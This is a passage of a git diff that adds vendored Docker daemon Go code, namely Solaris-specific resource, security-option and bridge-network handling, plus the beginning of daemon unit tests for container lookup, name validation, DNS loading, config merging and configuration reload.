lntypes "github.com/docker/libnetwork/types" + "github.com/opencontainers/runc/libcontainer/label" + 
"github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" +) + +//#include +import "C" + +const ( + defaultVirtualSwitch = "Virtual Switch" + platformSupported = true + solarisMinCPUShares = 1 + solarisMaxCPUShares = 65535 +) + +func getMemoryResources(config containertypes.Resources) specs.CappedMemory { + memory := specs.CappedMemory{} + + if config.Memory > 0 { + memory.Physical = strconv.FormatInt(config.Memory, 10) + } + + if config.MemorySwap != 0 { + memory.Swap = strconv.FormatInt(config.MemorySwap, 10) + } + + return memory +} + +func getCPUResources(config containertypes.Resources) specs.CappedCPU { + cpu := specs.CappedCPU{} + + if config.CpusetCpus != "" { + cpu.Ncpus = config.CpusetCpus + } + + return cpu +} + +func (daemon *Daemon) cleanupMountsByID(id string) error { + return nil +} + +func parseSecurityOpt(container *container.Container, config *containertypes.HostConfig) error { + //Since config.SecurityOpt is specifically defined as a "List of string values to + //customize labels for MLs systems, such as SELinux" + //until we figure out how to map to Trusted Extensions + //this is being disabled for now on Solaris + var ( + labelOpts []string + err error + ) + + if len(config.SecurityOpt) > 0 { + return errors.New("Security options are not supported on Solaris") + } + + container.ProcessLabel, container.MountLabel, err = label.InitLabels(labelOpts) + return err +} + +func setupRemappedRoot(config *Config) ([]idtools.IDMap, []idtools.IDMap, error) { + return nil, nil, nil +} + +func setupDaemonRoot(config *Config, rootDir string, rootUID, rootGID int) error { + return nil +} + +func (daemon *Daemon) getLayerInit() func(string) error { + return nil +} + +func checkKernel() error { + // solaris can rely upon checkSystem() below, we don't skew kernel versions + return nil +} + +func (daemon *Daemon) getCgroupDriver() string { + return "" +} + +func (daemon *Daemon) adaptContainerSettings(hostConfig *containertypes.HostConfig, 
adjustCPUShares bool) error { + if hostConfig.CPUShares < 0 { + logrus.Warnf("Changing requested CPUShares of %d to minimum allowed of %d", hostConfig.CPUShares, solarisMinCPUShares) + hostConfig.CPUShares = solarisMinCPUShares + } else if hostConfig.CPUShares > solarisMaxCPUShares { + logrus.Warnf("Changing requested CPUShares of %d to maximum allowed of %d", hostConfig.CPUShares, solarisMaxCPUShares) + hostConfig.CPUShares = solarisMaxCPUShares + } + + if hostConfig.Memory > 0 && hostConfig.MemorySwap == 0 { + // By default, MemorySwap is set to twice the size of Memory. + hostConfig.MemorySwap = hostConfig.Memory * 2 + } + + if hostConfig.ShmSize != 0 { + hostConfig.ShmSize = container.DefaultSHMSize + } + if hostConfig.OomKillDisable == nil { + defaultOomKillDisable := false + hostConfig.OomKillDisable = &defaultOomKillDisable + } + + return nil +} + +// UsingSystemd returns true if cli option includes native.cgroupdriver=systemd +func UsingSystemd(config *Config) bool { + return false +} + +// verifyPlatformContainerSettings performs platform-specific validation of the +// hostconfig and config structures. +func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes.HostConfig, config *containertypes.Config, update bool) ([]string, error) { + warnings := []string{} + sysInfo := sysinfo.New(true) + // NOTE: We do not enforce a minimum value for swap limits for zones on Solaris and + // therefore we will not do that for Docker container either. + if hostConfig.Memory > 0 && !sysInfo.MemoryLimit { + warnings = append(warnings, "Your kernel does not support memory limit capabilities. Limitation discarded.") + logrus.Warnf("Your kernel does not support memory limit capabilities. 
Limitation discarded.") + hostConfig.Memory = 0 + hostConfig.MemorySwap = -1 + } + if hostConfig.Memory > 0 && hostConfig.MemorySwap != -1 && !sysInfo.SwapLimit { + warnings = append(warnings, "Your kernel does not support swap limit capabilities, memory limited without swap.") + logrus.Warnf("Your kernel does not support swap limit capabilities, memory limited without swap.") + hostConfig.MemorySwap = -1 + } + if hostConfig.Memory > 0 && hostConfig.MemorySwap > 0 && hostConfig.MemorySwap < hostConfig.Memory { + return warnings, fmt.Errorf("Minimum memoryswap limit should be larger than memory limit, see usage.") + } + // Solaris NOTE: We allow and encourage setting the swap without setting the memory limit. + + if hostConfig.MemorySwappiness != nil && *hostConfig.MemorySwappiness != -1 && !sysInfo.MemorySwappiness { + warnings = append(warnings, "Your kernel does not support memory swappiness capabilities, memory swappiness discarded.") + logrus.Warnf("Your kernel does not support memory swappiness capabilities, memory swappiness discarded.") + hostConfig.MemorySwappiness = nil + } + if hostConfig.MemoryReservation > 0 && !sysInfo.MemoryReservation { + warnings = append(warnings, "Your kernel does not support memory soft limit capabilities. Limitation discarded.") + logrus.Warnf("Your kernel does not support memory soft limit capabilities. Limitation discarded.") + hostConfig.MemoryReservation = 0 + } + if hostConfig.Memory > 0 && hostConfig.MemoryReservation > 0 && hostConfig.Memory < hostConfig.MemoryReservation { + return warnings, fmt.Errorf("Minimum memory limit should be larger than memory reservation limit, see usage.") + } + if hostConfig.KernelMemory > 0 && !sysInfo.KernelMemory { + warnings = append(warnings, "Your kernel does not support kernel memory limit capabilities. Limitation discarded.") + logrus.Warnf("Your kernel does not support kernel memory limit capabilities. 
Limitation discarded.") + hostConfig.KernelMemory = 0 + } + if hostConfig.CPUShares != 0 && !sysInfo.CPUShares { + warnings = append(warnings, "Your kernel does not support CPU shares. Shares discarded.") + logrus.Warnf("Your kernel does not support CPU shares. Shares discarded.") + hostConfig.CPUShares = 0 + } + if hostConfig.CPUShares < 0 { + warnings = append(warnings, "Invalid CPUShares value. Must be positive. Discarding.") + logrus.Warnf("Invalid CPUShares value. Must be positive. Discarding.") + hostConfig.CPUQuota = 0 + } + if hostConfig.CPUShares > 0 && !sysinfo.IsCPUSharesAvailable() { + warnings = append(warnings, "Global zone default scheduling class not FSS. Discarding shares.") + logrus.Warnf("Global zone default scheduling class not FSS. Discarding shares.") + hostConfig.CPUShares = 0 + } + + // Solaris NOTE: Linux does not do negative checking for CPUShares and Quota here. But it makes sense to. + if hostConfig.CPUPeriod > 0 && !sysInfo.CPUCfsPeriod { + warnings = append(warnings, "Your kernel does not support CPU cfs period. Period discarded.") + logrus.Warnf("Your kernel does not support CPU cfs period. Period discarded.") + if hostConfig.CPUQuota > 0 { + warnings = append(warnings, "Quota will be applied on default period, not period specified.") + logrus.Warnf("Quota will be applied on default period, not period specified.") + } + hostConfig.CPUPeriod = 0 + } + if hostConfig.CPUQuota != 0 && !sysInfo.CPUCfsQuota { + warnings = append(warnings, "Your kernel does not support CPU cfs quota. Quota discarded.") + logrus.Warnf("Your kernel does not support CPU cfs quota. Quota discarded.") + hostConfig.CPUQuota = 0 + } + if hostConfig.CPUQuota < 0 { + warnings = append(warnings, "Invalid CPUQuota value. Must be positive. Discarding.") + logrus.Warnf("Invalid CPUQuota value. Must be positive. 
Discarding.") + hostConfig.CPUQuota = 0 + } + if (hostConfig.CpusetCpus != "" || hostConfig.CpusetMems != "") && !sysInfo.Cpuset { + warnings = append(warnings, "Your kernel does not support cpuset. Cpuset discarded.") + logrus.Warnf("Your kernel does not support cpuset. Cpuset discarded.") + hostConfig.CpusetCpus = "" + hostConfig.CpusetMems = "" + } + cpusAvailable, err := sysInfo.IsCpusetCpusAvailable(hostConfig.CpusetCpus) + if err != nil { + return warnings, fmt.Errorf("Invalid value %s for cpuset cpus.", hostConfig.CpusetCpus) + } + if !cpusAvailable { + return warnings, fmt.Errorf("Requested CPUs are not available - requested %s, available: %s.", hostConfig.CpusetCpus, sysInfo.Cpus) + } + memsAvailable, err := sysInfo.IsCpusetMemsAvailable(hostConfig.CpusetMems) + if err != nil { + return warnings, fmt.Errorf("Invalid value %s for cpuset mems.", hostConfig.CpusetMems) + } + if !memsAvailable { + return warnings, fmt.Errorf("Requested memory nodes are not available - requested %s, available: %s.", hostConfig.CpusetMems, sysInfo.Mems) + } + if hostConfig.BlkioWeight > 0 && !sysInfo.BlkioWeight { + warnings = append(warnings, "Your kernel does not support Block I/O weight. Weight discarded.") + logrus.Warnf("Your kernel does not support Block I/O weight. Weight discarded.") + hostConfig.BlkioWeight = 0 + } + if hostConfig.OomKillDisable != nil && !sysInfo.OomKillDisable { + *hostConfig.OomKillDisable = false + // Don't warn; this is the default setting but only applicable to Linux + } + + if sysInfo.IPv4ForwardingDisabled { + warnings = append(warnings, "IPv4 forwarding is disabled. Networking will not work.") + logrus.Warnf("IPv4 forwarding is disabled. Networking will not work") + } + + // Solaris NOTE: We do not allow setting Linux specific options, so check and warn for all of them. 
+ + if hostConfig.CapAdd != nil || hostConfig.CapDrop != nil { + warnings = append(warnings, "Adding or dropping kernel capabilities unsupported on Solaris.Discarding capabilities lists.") + logrus.Warnf("Adding or dropping kernel capabilities unsupported on Solaris.Discarding capabilities lists.") + hostConfig.CapAdd = nil + hostConfig.CapDrop = nil + } + + if hostConfig.GroupAdd != nil { + warnings = append(warnings, "Additional groups unsupported on Solaris.Discarding groups lists.") + logrus.Warnf("Additional groups unsupported on Solaris.Discarding groups lists.") + hostConfig.GroupAdd = nil + } + + if hostConfig.IpcMode != "" { + warnings = append(warnings, "IPC namespace assignment unsupported on Solaris.Discarding IPC setting.") + logrus.Warnf("IPC namespace assignment unsupported on Solaris.Discarding IPC setting.") + hostConfig.IpcMode = "" + } + + if hostConfig.PidMode != "" { + warnings = append(warnings, "PID namespace setting unsupported on Solaris. Running container in host PID namespace.") + logrus.Warnf("PID namespace setting unsupported on Solaris. Running container in host PID namespace.") + hostConfig.PidMode = "" + } + + if hostConfig.Privileged { + warnings = append(warnings, "Privileged mode unsupported on Solaris. Discarding privileged mode setting.") + logrus.Warnf("Privileged mode unsupported on Solaris. Discarding privileged mode setting.") + hostConfig.Privileged = false + } + + if hostConfig.UTSMode != "" { + warnings = append(warnings, "UTS namespace assignment unsupported on Solaris.Discarding UTS setting.") + logrus.Warnf("UTS namespace assignment unsupported on Solaris.Discarding UTS setting.") + hostConfig.UTSMode = "" + } + + if hostConfig.CgroupParent != "" { + warnings = append(warnings, "Specifying Cgroup parent unsupported on Solaris. Discarding cgroup parent setting.") + logrus.Warnf("Specifying Cgroup parent unsupported on Solaris. 
Discarding cgroup parent setting.") + hostConfig.CgroupParent = "" + } + + if hostConfig.Ulimits != nil { + warnings = append(warnings, "Specifying ulimits unsupported on Solaris. Discarding ulimits setting.") + logrus.Warnf("Specifying ulimits unsupported on Solaris. Discarding ulimits setting.") + hostConfig.Ulimits = nil + } + + return warnings, nil +} + +// platformReload update configuration with platform specific options +func (daemon *Daemon) platformReload(config *Config) map[string]string { + return map[string]string{} +} + +// verifyDaemonSettings performs validation of daemon config struct +func verifyDaemonSettings(config *Config) error { + + if config.DefaultRuntime == "" { + config.DefaultRuntime = stockRuntimeName + } + if config.Runtimes == nil { + config.Runtimes = make(map[string]types.Runtime) + } + stockRuntimeOpts := []string{} + config.Runtimes[stockRuntimeName] = types.Runtime{Path: DefaultRuntimeBinary, Args: stockRuntimeOpts} + + // checkSystem validates platform-specific requirements + return nil +} + +func checkSystem() error { + // check OS version for compatibility, ensure running in global zone + var err error + var id C.zoneid_t + + if id, err = C.getzoneid(); err != nil { + return fmt.Errorf("Exiting. Error getting zone id: %+v", err) + } + if int(id) != 0 { + return fmt.Errorf("Exiting because the Docker daemon is not running in the global zone") + } + + v, err := kernel.GetKernelVersion() + if kernel.CompareKernelVersion(*v, kernel.VersionInfo{Kernel: 5, Major: 12, Minor: 0}) < 0 { + return fmt.Errorf("Your Solaris kernel version: %s doesn't support Docker. 
Please upgrade to 5.12.0", v.String()) + } + return err +} + +// configureMaxThreads sets the Go runtime max threads threshold +// which is 90% of the kernel setting from /proc/sys/kernel/threads-max +func configureMaxThreads(config *Config) error { + return nil +} + +// configureKernelSecuritySupport configures and validate security support for the kernel +func configureKernelSecuritySupport(config *Config, driverName string) error { + return nil +} + +func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[string]interface{}) (libnetwork.NetworkController, error) { + netOptions, err := daemon.networkOptions(config, daemon.PluginStore, activeSandboxes) + if err != nil { + return nil, err + } + + controller, err := libnetwork.New(netOptions...) + if err != nil { + return nil, fmt.Errorf("error obtaining controller instance: %v", err) + } + + // Initialize default network on "null" + if _, err := controller.NewNetwork("null", "none", "", libnetwork.NetworkOptionPersist(false)); err != nil { + return nil, fmt.Errorf("Error creating default 'null' network: %v", err) + } + + if !config.DisableBridge { + // Initialize default driver "bridge" + if err := initBridgeDriver(controller, config); err != nil { + return nil, err + } + } + + return controller, nil +} + +func initBridgeDriver(controller libnetwork.NetworkController, config *Config) error { + if n, err := controller.NetworkByName("bridge"); err == nil { + if err = n.Delete(); err != nil { + return fmt.Errorf("could not delete the default bridge network: %v", err) + } + } + + bridgeName := bridge.DefaultBridgeName + if config.bridgeConfig.Iface != "" { + bridgeName = config.bridgeConfig.Iface + } + netOption := map[string]string{ + bridge.BridgeName: bridgeName, + bridge.DefaultBridge: strconv.FormatBool(true), + netlabel.DriverMTU: strconv.Itoa(config.Mtu), + bridge.EnableICC: strconv.FormatBool(config.bridgeConfig.InterContainerCommunication), + } + + // --ip processing + if 
config.bridgeConfig.DefaultIP != nil { + netOption[bridge.DefaultBindingIP] = config.bridgeConfig.DefaultIP.String() + } + + var ipamV4Conf *libnetwork.IpamConf + + ipamV4Conf = &libnetwork.IpamConf{AuxAddresses: make(map[string]string)} + + nwList, _, err := netutils.ElectInterfaceAddresses(bridgeName) + if err != nil { + return errors.Wrap(err, "list bridge addresses failed") + } + + nw := nwList[0] + if len(nwList) > 1 && config.bridgeConfig.FixedCIDR != "" { + _, fCIDR, err := net.ParseCIDR(config.bridgeConfig.FixedCIDR) + if err != nil { + return errors.Wrap(err, "parse CIDR failed") + } + // Iterate through in case there are multiple addresses for the bridge + for _, entry := range nwList { + if fCIDR.Contains(entry.IP) { + nw = entry + break + } + } + } + + ipamV4Conf.PreferredPool = lntypes.GetIPNetCanonical(nw).String() + hip, _ := lntypes.GetHostPartIP(nw.IP, nw.Mask) + if hip.IsGlobalUnicast() { + ipamV4Conf.Gateway = nw.IP.String() + } + + if config.bridgeConfig.IP != "" { + ipamV4Conf.PreferredPool = config.bridgeConfig.IP + ip, _, err := net.ParseCIDR(config.bridgeConfig.IP) + if err != nil { + return err + } + ipamV4Conf.Gateway = ip.String() + } else if bridgeName == bridge.DefaultBridgeName && ipamV4Conf.PreferredPool != "" { + logrus.Infof("Default bridge (%s) is assigned with an IP address %s. 
Daemon option --bip can be used to set a preferred IP address", bridgeName, ipamV4Conf.PreferredPool) + } + + if config.bridgeConfig.FixedCIDR != "" { + _, fCIDR, err := net.ParseCIDR(config.bridgeConfig.FixedCIDR) + if err != nil { + return err + } + + ipamV4Conf.SubPool = fCIDR.String() + } + + if config.bridgeConfig.DefaultGatewayIPv4 != nil { + ipamV4Conf.AuxAddresses["DefaultGatewayIPv4"] = config.bridgeConfig.DefaultGatewayIPv4.String() + } + + v4Conf := []*libnetwork.IpamConf{ipamV4Conf} + v6Conf := []*libnetwork.IpamConf{} + + // Initialize default network on "bridge" with the same name + _, err = controller.NewNetwork("bridge", "bridge", "", + libnetwork.NetworkOptionDriverOpts(netOption), + libnetwork.NetworkOptionIpam("default", "", v4Conf, v6Conf, nil), + libnetwork.NetworkOptionDeferIPv6Alloc(false)) + if err != nil { + return fmt.Errorf("Error creating default 'bridge' network: %v", err) + } + return nil +} + +// registerLinks sets up links between containers and writes the +// configuration out for persistence. +func (daemon *Daemon) registerLinks(container *container.Container, hostConfig *containertypes.HostConfig) error { + return nil +} + +func (daemon *Daemon) cleanupMounts() error { + return nil +} + +// conditionalMountOnStart is a platform specific helper function during the +// container start to call mount. +func (daemon *Daemon) conditionalMountOnStart(container *container.Container) error { + return daemon.Mount(container) +} + +// conditionalUnmountOnCleanup is a platform specific helper function called +// during the cleanup of a container to unmount. 
+func (daemon *Daemon) conditionalUnmountOnCleanup(container *container.Container) error { + return daemon.Unmount(container) +} + +func restoreCustomImage(is image.Store, ls layer.Store, rs reference.Store) error { + // Solaris has no custom images to register + return nil +} + +func driverOptions(config *Config) []nwconfig.Option { + return []nwconfig.Option{} +} + +func (daemon *Daemon) stats(c *container.Container) (*types.StatsJSON, error) { + return nil, nil +} + +// setDefaultIsolation determine the default isolation mode for the +// daemon to run in. This is only applicable on Windows +func (daemon *Daemon) setDefaultIsolation() error { + return nil +} + +func rootFSToAPIType(rootfs *image.RootFS) types.RootFS { + return types.RootFS{} +} + +func setupDaemonProcess(config *Config) error { + return nil +} + +func (daemon *Daemon) setupSeccompProfile() error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/daemon_test.go b/vendor/github.com/docker/docker/daemon/daemon_test.go new file mode 100644 index 0000000000..00817bd1b6 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/daemon_test.go @@ -0,0 +1,627 @@ +// +build !solaris + +package daemon + +import ( + "io/ioutil" + "os" + "path/filepath" + "reflect" + "testing" + "time" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/discovery" + _ "github.com/docker/docker/pkg/discovery/memory" + "github.com/docker/docker/pkg/registrar" + "github.com/docker/docker/pkg/truncindex" + "github.com/docker/docker/registry" + "github.com/docker/docker/volume" + volumedrivers "github.com/docker/docker/volume/drivers" + "github.com/docker/docker/volume/local" + "github.com/docker/docker/volume/store" + "github.com/docker/go-connections/nat" +) + +// +// https://github.com/docker/docker/issues/8069 +// + +func TestGetContainer(t *testing.T) { + c1 := &container.Container{ + CommonContainer: 
container.CommonContainer{ + ID: "5a4ff6a163ad4533d22d69a2b8960bf7fafdcba06e72d2febdba229008b0bf57", + Name: "tender_bardeen", + }, + } + + c2 := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: "3cdbd1aa394fd68559fd1441d6eff2ab7c1e6363582c82febfaa8045df3bd8de", + Name: "drunk_hawking", + }, + } + + c3 := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: "3cdbd1aa394fd68559fd1441d6eff2abfafdcba06e72d2febdba229008b0bf57", + Name: "3cdbd1aa", + }, + } + + c4 := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: "75fb0b800922abdbef2d27e60abcdfaf7fb0698b2a96d22d3354da361a6ff4a5", + Name: "5a4ff6a163ad4533d22d69a2b8960bf7fafdcba06e72d2febdba229008b0bf57", + }, + } + + c5 := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: "d22d69a2b8960bf7fafdcba06e72d2febdba960bf7fafdcba06e72d2f9008b060b", + Name: "d22d69a2b896", + }, + } + + store := container.NewMemoryStore() + store.Add(c1.ID, c1) + store.Add(c2.ID, c2) + store.Add(c3.ID, c3) + store.Add(c4.ID, c4) + store.Add(c5.ID, c5) + + index := truncindex.NewTruncIndex([]string{}) + index.Add(c1.ID) + index.Add(c2.ID) + index.Add(c3.ID) + index.Add(c4.ID) + index.Add(c5.ID) + + daemon := &Daemon{ + containers: store, + idIndex: index, + nameIndex: registrar.NewRegistrar(), + } + + daemon.reserveName(c1.ID, c1.Name) + daemon.reserveName(c2.ID, c2.Name) + daemon.reserveName(c3.ID, c3.Name) + daemon.reserveName(c4.ID, c4.Name) + daemon.reserveName(c5.ID, c5.Name) + + if container, _ := daemon.GetContainer("3cdbd1aa394fd68559fd1441d6eff2ab7c1e6363582c82febfaa8045df3bd8de"); container != c2 { + t.Fatal("Should explicitly match full container IDs") + } + + if container, _ := daemon.GetContainer("75fb0b8009"); container != c4 { + t.Fatal("Should match a partial ID") + } + + if container, _ := daemon.GetContainer("drunk_hawking"); container != c2 { + t.Fatal("Should match a full name") + } + + // c3.Name is a partial match for both c3.ID 
and c2.ID + if c, _ := daemon.GetContainer("3cdbd1aa"); c != c3 { + t.Fatal("Should match a full name even though it collides with another container's ID") + } + + if container, _ := daemon.GetContainer("d22d69a2b896"); container != c5 { + t.Fatal("Should match a container where the provided prefix is an exact match to the its name, and is also a prefix for its ID") + } + + if _, err := daemon.GetContainer("3cdbd1"); err == nil { + t.Fatal("Should return an error when provided a prefix that partially matches multiple container ID's") + } + + if _, err := daemon.GetContainer("nothing"); err == nil { + t.Fatal("Should return an error when provided a prefix that is neither a name or a partial match to an ID") + } +} + +func initDaemonWithVolumeStore(tmp string) (*Daemon, error) { + var err error + daemon := &Daemon{ + repository: tmp, + root: tmp, + } + daemon.volumes, err = store.New(tmp) + if err != nil { + return nil, err + } + + volumesDriver, err := local.New(tmp, 0, 0) + if err != nil { + return nil, err + } + volumedrivers.Register(volumesDriver, volumesDriver.Name()) + + return daemon, nil +} + +func TestValidContainerNames(t *testing.T) { + invalidNames := []string{"-rm", "&sdfsfd", "safd%sd"} + validNames := []string{"word-word", "word_word", "1weoid"} + + for _, name := range invalidNames { + if validContainerNamePattern.MatchString(name) { + t.Fatalf("%q is not a valid container name and was returned as valid.", name) + } + } + + for _, name := range validNames { + if !validContainerNamePattern.MatchString(name) { + t.Fatalf("%q is a valid container name and was returned as invalid.", name) + } + } +} + +func TestContainerInitDNS(t *testing.T) { + tmp, err := ioutil.TempDir("", "docker-container-test-") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + + containerID := "d59df5276e7b219d510fe70565e0404bc06350e0d4b43fe961f22f339980170e" + containerPath := filepath.Join(tmp, containerID) + if err := os.MkdirAll(containerPath, 0755); err != nil 
{ + t.Fatal(err) + } + + config := `{"State":{"Running":true,"Paused":false,"Restarting":false,"OOMKilled":false,"Dead":false,"Pid":2464,"ExitCode":0, +"Error":"","StartedAt":"2015-05-26T16:48:53.869308965Z","FinishedAt":"0001-01-01T00:00:00Z"}, +"ID":"d59df5276e7b219d510fe70565e0404bc06350e0d4b43fe961f22f339980170e","Created":"2015-05-26T16:48:53.7987917Z","Path":"top", +"Args":[],"Config":{"Hostname":"d59df5276e7b","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"Cpuset":"", +"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"PortSpecs":null,"ExposedPorts":null,"Tty":true,"OpenStdin":true, +"StdinOnce":false,"Env":null,"Cmd":["top"],"Image":"ubuntu:latest","Volumes":null,"WorkingDir":"","Entrypoint":null, +"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"Labels":{}},"Image":"07f8e8c5e66084bef8f848877857537ffe1c47edd01a93af27e7161672ad0e95", +"NetworkSettings":{"IPAddress":"172.17.0.1","IPPrefixLen":16,"MacAddress":"02:42:ac:11:00:01","LinkLocalIPv6Address":"fe80::42:acff:fe11:1", +"LinkLocalIPv6PrefixLen":64,"GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"Gateway":"172.17.42.1","IPv6Gateway":"","Bridge":"docker0","Ports":{}}, +"ResolvConfPath":"/var/lib/docker/containers/d59df5276e7b219d510fe70565e0404bc06350e0d4b43fe961f22f339980170e/resolv.conf", +"HostnamePath":"/var/lib/docker/containers/d59df5276e7b219d510fe70565e0404bc06350e0d4b43fe961f22f339980170e/hostname", +"HostsPath":"/var/lib/docker/containers/d59df5276e7b219d510fe70565e0404bc06350e0d4b43fe961f22f339980170e/hosts", +"LogPath":"/var/lib/docker/containers/d59df5276e7b219d510fe70565e0404bc06350e0d4b43fe961f22f339980170e/d59df5276e7b219d510fe70565e0404bc06350e0d4b43fe961f22f339980170e-json.log", +"Name":"/ubuntu","Driver":"aufs","MountLabel":"","ProcessLabel":"","AppArmorProfile":"","RestartCount":0, +"UpdateDns":false,"Volumes":{},"VolumesRW":{},"AppliedVolumesFrom":null}` + + // Container struct only used to retrieve path to config file + container := 
&container.Container{CommonContainer: container.CommonContainer{Root: containerPath}} + configPath, err := container.ConfigPath() + if err != nil { + t.Fatal(err) + } + if err = ioutil.WriteFile(configPath, []byte(config), 0644); err != nil { + t.Fatal(err) + } + + hostConfig := `{"Binds":[],"ContainerIDFile":"","Memory":0,"MemorySwap":0,"CpuShares":0,"CpusetCpus":"", +"Privileged":false,"PortBindings":{},"Links":null,"PublishAllPorts":false,"Dns":null,"DnsOptions":null,"DnsSearch":null,"ExtraHosts":null,"VolumesFrom":null, +"Devices":[],"NetworkMode":"bridge","IpcMode":"","PidMode":"","CapAdd":null,"CapDrop":null,"RestartPolicy":{"Name":"no","MaximumRetryCount":0}, +"SecurityOpt":null,"ReadonlyRootfs":false,"Ulimits":null,"LogConfig":{"Type":"","Config":null},"CgroupParent":""}` + + hostConfigPath, err := container.HostConfigPath() + if err != nil { + t.Fatal(err) + } + if err = ioutil.WriteFile(hostConfigPath, []byte(hostConfig), 0644); err != nil { + t.Fatal(err) + } + + daemon, err := initDaemonWithVolumeStore(tmp) + if err != nil { + t.Fatal(err) + } + defer volumedrivers.Unregister(volume.DefaultDriverName) + + c, err := daemon.load(containerID) + if err != nil { + t.Fatal(err) + } + + if c.HostConfig.DNS == nil { + t.Fatal("Expected container DNS to not be nil") + } + + if c.HostConfig.DNSSearch == nil { + t.Fatal("Expected container DNSSearch to not be nil") + } + + if c.HostConfig.DNSOptions == nil { + t.Fatal("Expected container DNSOptions to not be nil") + } +} + +func newPortNoError(proto, port string) nat.Port { + p, _ := nat.NewPort(proto, port) + return p +} + +func TestMerge(t *testing.T) { + volumesImage := make(map[string]struct{}) + volumesImage["/test1"] = struct{}{} + volumesImage["/test2"] = struct{}{} + portsImage := make(nat.PortSet) + portsImage[newPortNoError("tcp", "1111")] = struct{}{} + portsImage[newPortNoError("tcp", "2222")] = struct{}{} + configImage := &containertypes.Config{ + ExposedPorts: portsImage, + Env: []string{"VAR1=1", 
"VAR2=2"}, + Volumes: volumesImage, + } + + portsUser := make(nat.PortSet) + portsUser[newPortNoError("tcp", "2222")] = struct{}{} + portsUser[newPortNoError("tcp", "3333")] = struct{}{} + volumesUser := make(map[string]struct{}) + volumesUser["/test3"] = struct{}{} + configUser := &containertypes.Config{ + ExposedPorts: portsUser, + Env: []string{"VAR2=3", "VAR3=3"}, + Volumes: volumesUser, + } + + if err := merge(configUser, configImage); err != nil { + t.Error(err) + } + + if len(configUser.ExposedPorts) != 3 { + t.Fatalf("Expected 3 ExposedPorts, 1111, 2222 and 3333, found %d", len(configUser.ExposedPorts)) + } + for portSpecs := range configUser.ExposedPorts { + if portSpecs.Port() != "1111" && portSpecs.Port() != "2222" && portSpecs.Port() != "3333" { + t.Fatalf("Expected 1111 or 2222 or 3333, found %s", portSpecs) + } + } + if len(configUser.Env) != 3 { + t.Fatalf("Expected 3 env var, VAR1=1, VAR2=3 and VAR3=3, found %d", len(configUser.Env)) + } + for _, env := range configUser.Env { + if env != "VAR1=1" && env != "VAR2=3" && env != "VAR3=3" { + t.Fatalf("Expected VAR1=1 or VAR2=3 or VAR3=3, found %s", env) + } + } + + if len(configUser.Volumes) != 3 { + t.Fatalf("Expected 3 volumes, /test1, /test2 and /test3, found %d", len(configUser.Volumes)) + } + for v := range configUser.Volumes { + if v != "/test1" && v != "/test2" && v != "/test3" { + t.Fatalf("Expected /test1 or /test2 or /test3, found %s", v) + } + } + + ports, _, err := nat.ParsePortSpecs([]string{"0000"}) + if err != nil { + t.Error(err) + } + configImage2 := &containertypes.Config{ + ExposedPorts: ports, + } + + if err := merge(configUser, configImage2); err != nil { + t.Error(err) + } + + if len(configUser.ExposedPorts) != 4 { + t.Fatalf("Expected 4 ExposedPorts, 0000, 1111, 2222 and 3333, found %d", len(configUser.ExposedPorts)) + } + for portSpecs := range configUser.ExposedPorts { + if portSpecs.Port() != "0" && portSpecs.Port() != "1111" && portSpecs.Port() != "2222" && portSpecs.Port() != 
"3333" { + t.Fatalf("Expected %q or %q or %q or %q, found %s", 0, 1111, 2222, 3333, portSpecs) + } + } +} + +func TestDaemonReloadLabels(t *testing.T) { + daemon := &Daemon{} + daemon.configStore = &Config{ + CommonConfig: CommonConfig{ + Labels: []string{"foo:bar"}, + }, + } + + valuesSets := make(map[string]interface{}) + valuesSets["labels"] = "foo:baz" + newConfig := &Config{ + CommonConfig: CommonConfig{ + Labels: []string{"foo:baz"}, + valuesSet: valuesSets, + }, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + label := daemon.configStore.Labels[0] + if label != "foo:baz" { + t.Fatalf("Expected daemon label `foo:baz`, got %s", label) + } +} + +func TestDaemonReloadInsecureRegistries(t *testing.T) { + daemon := &Daemon{} + // initialize daemon with existing insecure registries: "127.0.0.0/8", "10.10.1.11:5000", "10.10.1.22:5000" + daemon.RegistryService = registry.NewService(registry.ServiceOptions{ + InsecureRegistries: []string{ + "127.0.0.0/8", + "10.10.1.11:5000", + "10.10.1.22:5000", // this will be removed when reloading + "docker1.com", + "docker2.com", // this will be removed when reloading + }, + }) + + daemon.configStore = &Config{} + + insecureRegistries := []string{ + "127.0.0.0/8", // this will be kept + "10.10.1.11:5000", // this will be kept + "10.10.1.33:5000", // this will be newly added + "docker1.com", // this will be kept + "docker3.com", // this will be newly added + } + + valuesSets := make(map[string]interface{}) + valuesSets["insecure-registries"] = insecureRegistries + + newConfig := &Config{ + CommonConfig: CommonConfig{ + ServiceOptions: registry.ServiceOptions{ + InsecureRegistries: insecureRegistries, + }, + valuesSet: valuesSets, + }, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + // After Reload, daemon.RegistryService will be changed which is useful + // for registry communication in daemon. 
